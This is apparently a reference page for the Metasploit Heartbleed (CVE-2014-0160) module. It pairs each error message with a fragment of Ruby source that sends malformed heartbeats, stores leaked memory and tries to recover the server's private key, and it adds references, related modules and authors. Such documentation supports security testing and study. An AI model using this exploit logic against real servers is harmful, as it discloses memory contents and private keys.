204: if response_timeout < 0
205: print_error('RESPONSE_TIMEOUT should be bigger than 0')
RESPONSE_TIMEOUT should be bigger than 0
Here is a relevant code snippet related to the "RESPONSE_TIMEOUT should be bigger than 0" error message:
200: print_error('HEARTBEAT_LENGTH should be a natural number less than 65536')
201: return
202: end
203:
204: if response_timeout < 0
205: print_error('RESPONSE_TIMEOUT should be bigger than 0')
206: return
207: end
208:
209: super
210: end
Unknown Action: <ACTION.NAME>
Here is a relevant code snippet related to the "Unknown Action: <ACTION.NAME>" error message:
225: loot_and_report(bleeded)
226: when 'KEYS'
227: get_keys
228: else
229: # Shouldn't get here, since Action is Enum
230: print_error("Unknown Action: #{action.name}")
231: end
232:
233: # ensure all connections are closed
234: disconnect
235: end
"]urn:ietf:params:xml:ns:xmpp-tls[
Here is a relevant code snippet related to the ""]urn:ietf:params:xml:ns:xmpp-tls[" error message:
362: vprint_status("Connecting with autodetected remote XMPP hostname: #{jabber_host[1]}...")
363: sock.put(jabber_connect_msg(jabber_host[1]))
364: res = get_data
365: end
366: end
367: if res.nil? || res.include?('stream:error') || res !~ /<starttls xmlns=['"]urn:ietf:params:xml:ns:xmpp-tls['"]/
368: vprint_error("Jabber host unknown. Please try changing the XMPPDOMAIN option.") if res && res.include?('host-unknown')
369: return nil
370: end
371: msg = "<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>"
372: sock.put(msg)
Jabber host unknown. Please try changing the XMPPDOMAIN option.
Here is a relevant code snippet related to the "Jabber host unknown. Please try changing the XMPPDOMAIN option." error message:
363: sock.put(jabber_connect_msg(jabber_host[1]))
364: res = get_data
365: end
366: end
367: if res.nil? || res.include?('stream:error') || res !~ /<starttls xmlns=['"]urn:ietf:params:xml:ns:xmpp-tls['"]/
368: vprint_error("Jabber host unknown. Please try changing the XMPPDOMAIN option.") if res && res.include?('host-unknown')
369: return nil
370: end
371: msg = "<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>"
372: sock.put(msg)
373: res = get_data
FTP error: <RES.STRIP>
Here is a relevant code snippet related to the "FTP error: <RES.STRIP>" error message:
382: sock.put("AUTH TLS\r\n")
383: res = get_data
384: return nil if res.nil?
385: if res !~ /^234/
386: # res contains the error message
387: vprint_error("FTP error: #{res.strip}")
388: return nil
389: end
390: res
391: end
392:
STARTTLS failed...
Here is a relevant code snippet related to the "STARTTLS failed..." error message:
429:
430: unless tls_callback == 'None'
431: vprint_status("Trying to start SSL via #{tls_callback}")
432: res = self.send(TLS_CALLBACKS[tls_callback])
433: if res.nil?
434: vprint_error("STARTTLS failed...")
435: return nil
436: end
437: end
438:
439: vprint_status("Sending Client Hello...")
Server Hello Not Found
Here is a relevant code snippet related to the "Server Hello Not Found" error message:
440: sock.put(client_hello)
441:
442: server_resp = get_server_hello
443:
444: if server_resp.nil?
445: vprint_error("Server Hello Not Found")
446: return nil
447: end
448:
449: server_resp
450: end
No Heartbeat response...
Here is a relevant code snippet related to the "No Heartbeat response..." error message:
464:
465: vprint_status("Sending Heartbeat...")
466: sock.put(heartbeat_request(heartbeat_length))
467: hdr = get_data(SSL_RECORD_HEADER_SIZE)
468: if hdr.nil? || hdr.empty?
469: vprint_error("No Heartbeat response...")
470: disconnect
471: return
472: end
473:
474: unpacked = hdr.unpack('Cnn')
Protocol error. Looks like the chosen protocol is not supported.
Here is a relevant code snippet related to the "Protocol error. Looks like the chosen protocol is not supported." error message:
484: alert_desc = alert_unp[1]
485:
486: # http://tools.ietf.org/html/rfc5246#section-7.2
487: case alert_desc
488: when 0x46
489: msg = 'Protocol error. Looks like the chosen protocol is not supported.'
490: else
491: msg = 'Unknown error'
492: end
493: vprint_error("#{msg}")
494: disconnect
Unknown error
Here is a relevant code snippet related to the "Unknown error" error message:
486: # http://tools.ietf.org/html/rfc5246#section-7.2
487: case alert_desc
488: when 0x46
489: msg = 'Protocol error. Looks like the chosen protocol is not supported.'
490: else
491: msg = 'Unknown error'
492: end
493: vprint_error("#{msg}")
494: disconnect
495: return
496: end
Unexpected Heartbeat response header (<TO_HEX_STRING-HDR>)
Here is a relevant code snippet related to the "Unexpected Heartbeat response header (<TO_HEX_STRING-HDR>)" error message:
494: disconnect
495: return
496: end
497:
498: unless type == HEARTBEAT_RECORD_TYPE && version == TLS_VERSION[tls_version]
499: vprint_error("Unexpected Heartbeat response header (#{to_hex_string(hdr)})")
500: disconnect
501: return
502: end
503:
504: heartbeat_data = get_data(heartbeat_length)
Looks like there isn't leaked information...
Here is a relevant code snippet related to the "Looks like there isn't leaked information..." error message:
508: end
509:
510: # Stores received data
511: def loot_and_report(heartbeat_data)
512: if heartbeat_data.to_s.empty?
513: vprint_error("Looks like there isn't leaked information...")
514: return
515: end
516:
517: print_good("Heartbeat response with leak, #{heartbeat_data.length} bytes")
518: report_vuln({
Failed to get public key, aborting.
Here is a relevant code snippet related to the "Failed to get public key, aborting." error message:
573:
574: print_status("Getting public key constants...")
575: n, e = get_ne
576:
577: if n.nil? || e.nil?
578: print_error("Failed to get public key, aborting.")
579: end
580:
581: vprint_status("n: #{n}")
582: vprint_status("e: #{e}")
583: print_status("#{Time.now.getutc} - Starting.")
Private key not found. You can try to increase MAX_KEYTRIES and/or HEARTBEAT_LENGTH.
Here is a relevant code snippet related to the "Private key not found. You can try to increase MAX_KEYTRIES and/or HEARTBEAT_LENGTH." error message:
609: print_status("Private key stored in #{path}")
610: return
611: end
612: count += 1
613: }
614: print_error("Private key not found. You can try to increase MAX_KEYTRIES and/or HEARTBEAT_LENGTH.")
615: end
616:
617: # Returns the N and E params from the public server certificate
618: def get_ne
619: unless @cert
No certificate found
Here is a relevant code snippet related to the "No certificate found" error message:
615: end
616:
617: # Returns the N and E params from the public server certificate
618: def get_ne
619: unless @cert
620: print_error("No certificate found")
621: return
622: end
623:
624: return @cert.public_key.params['n'], @cert.public_key.params['e']
625: end
No SSL record header received after <RESPONSE_TIMEOUT> seconds...
Here is a relevant code snippet related to the "No SSL record header received after <RESPONSE_TIMEOUT> seconds..." error message:
708:
709: def get_ssl_record
710: hdr = get_data(SSL_RECORD_HEADER_SIZE)
711:
712: unless hdr
713: vprint_error("No SSL record header received after #{response_timeout} seconds...")
714: return nil
715: end
716:
717: len = hdr.unpack('Cnn')[2]
718: data = get_data(len) unless len.nil?
No SSL record contents received after <RESPONSE_TIMEOUT> seconds...
Here is a relevant code snippet related to the "No SSL record contents received after <RESPONSE_TIMEOUT> seconds..." error message:
716:
717: len = hdr.unpack('Cnn')[2]
718: data = get_data(len) unless len.nil?
719:
720: unless data
721: vprint_error("No SSL record contents received after #{response_timeout} seconds...")
722: return nil
723: end
724:
725: hdr << data
726: end
Type: Handshake type <HS_TYPE> not implemented
Here is a relevant code snippet related to the "Type: Handshake type <HS_TYPE> not implemented" error message:
792: vprint_status("\t\tType: Server Key Exchange (#{hs_type})")
793: # handshake_parsed = parse_server_key_exchange(hs_data)
794: when HANDSHAKE_SERVER_HELLO_DONE_TYPE
795: vprint_status("\t\tType: Server Hello Done (#{hs_type})")
796: else
797: vprint_status("\t\tType: Handshake type #{hs_type} not implemented")
798: end
799:
800: handshakes << {
801: :type => hs_type,
802: :len => hs_len,
Go back to menu.
Related Pull Requests
- #13443 Merged Pull Request: Add descriptions to auxiliary modules Actions
- #10973 Merged Pull Request: Rework DisclosureDate check in msftidy, including ISO 8601 support
- #10683 Merged Pull Request: Prefer to_s in Heartbleed for cleaner code
- #10680 Merged Pull Request: Add LEAK_COUNT option to Heartbleed
- #10625 Merged Pull Request: Add
repeat
command for repeating other commands - #10570 Merged Pull Request: AKA Metadata Refactor
- #9776 Merged Pull Request: if data is nil stop reading the heartbleed socket
- #8750 Merged Pull Request: openssl_heartbleed fix, use ruby 2.4 OpenSSL::PKey::RSA API
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8629 Merged Pull Request: add 'Also known as', AKA 'AKA', to module references
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #6526 Merged Pull Request: Peers for the peer god
- #6182 Merged Pull Request: Dramatic speed-up in bleeding, improved verbose output of leaked data.
- #5218 Merged Pull Request: Fix #3816 by deleting print_debug
- #5059 Merged Pull Request: Yard doc corrections
- #4338 Merged Pull Request: fix heartbleed cert parsing, fix #4309
References
- CVE-2014-0160
- VU#720951
- https://www.us-cert.gov/ncas/alerts/TA14-098A
- http://heartbleed.com/
- https://github.com/FiloSottile/Heartbleed
- https://gist.github.com/takeshixx/10107280
- http://filippo.io/Heartbleed/
See Also
Check also the following modules related to this module:
- auxiliary/server/openssl_heartbeat_client_memory
- auxiliary/scanner/ssl/openssl_ccs
- auxiliary/scanner/ssl/bleichenbacher_oracle
- auxiliary/scanner/ssl/ssl_version
- auxiliary/dos/ssl/openssl_aesni
- auxiliary/server/openssl_altchainsforgery_mitm_proxy
- payload/cmd/unix/reverse_openssl
- auxiliary/dos/ssl/dtls_changecipherspec
- auxiliary/dos/ssl/dtls_fragment_overflow
- exploit/windows/ssl/ms04_011_pct
Related Nessus plugins:
- CentOS 6 : openssl (CESA-2014:0376)
- Debian DSA-2896-1 : openssl - security update
- FreeBSD : OpenSSL -- Remote Information Disclosure (5631ae98-be9e-11e3-b5e3-c80aa9043978)
- Oracle Linux 6 : openssl (ELSA-2014-0376)
- RHEL 6 : openssl (RHSA-2014:0376)
- Ubuntu 12.04 LTS / 12.10 / 13.10 : openssl vulnerabilities (USN-2165-1)
- GLSA-201404-07 : OpenSSL: Information Disclosure
- Scientific Linux Security Update : openssl on SL6.x i386/x86_64
- Slackware 14.0 / 14.1 / current : openssl (SSA:2014-098-01)
- OpenSSL Heartbeat Information Disclosure (Heartbleed)
Authors
- Neel Mehta
- Riku
- Antti
- Matti
- Jared Stafford <jspenguin[at]jspenguin.org>
- FiloSottile
- Christian Mehlmauer
- wvu
- juan vazquez
- Sebastiano Di Paola
- Tom Sellers
- jjarmoc
- Ben Buchanan
- herself
Version
This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.